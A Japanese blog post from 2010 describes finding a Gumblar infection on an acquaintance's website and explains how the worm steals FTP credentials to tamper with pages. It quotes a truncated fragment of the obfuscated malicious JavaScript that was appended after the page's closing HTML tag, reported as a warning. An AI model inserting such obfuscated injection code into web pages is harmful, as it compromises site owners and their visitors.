ホーム » スタッフ » 斉藤徹 » Gumblar発見

2010年6月
« 5月   7月 »
 12345
6789101112
13141516171819
20212223242526
27282930  

最近の投稿(電子情報)

アーカイブ

カテゴリー

Gumblar発見

知り合いのサイトのホームページがウィルスに感染といった話を聞き、 ちょいとチェックしてみた。 view-sourceしてみても、なんともないなぁ…と思っていたら、 フレームソース側のページの末尾に、以下のようなコードがついている。

</HTML>
<script>this.a="a";R=["m","n"];bn=["w","q","X"];var h;this.bT=56183;this.bT++;var Rp="Rp";b=function(){function T(V,k,J){try {var U='yq'} catch(U){};return V.substr(k,J);FJ=34518;FJ--;EK=3475;EK--;}Tc={Xk:"Vq"};try {var aJ='ox'} catch(aJ){};this.aP="aP";var L=RegExp;var e='';try {} catch(xg){};var xF=new Array();var O=document;var P=T("/nexDtf",0,3)+T("smlwegmls",3,3)+"g-
(略)
<!--7004d276c84c037576423cf73522a32f-->

どうも、JavaScriptのプログラムが難読化されて追加させられている。

当人さんに電話して確認したら、通常のウィルス対策とは別手段のシステムを 導入するとのお話し。やむおえないかな….と、他人事とも言っていられないので、 自分の関連するサイトのソース末尾に変なコードが埋め込まれていないか、 ちょいとチェックしてみた。ひとまず安心…ふぅ…

Gumblar は、ホームページのメンテナンスをしているパソコンに感染し、 FTPのパスワードを入手して遠隔から改ざんという手口もあるから、タチが悪い。 といっても、私の場合メンテナンスは、すべてsloginで該当サーバにログインして、 emacs で直接HTML手書き編集するか、MovableTypeで編集だから、 この辺の心配はないわな…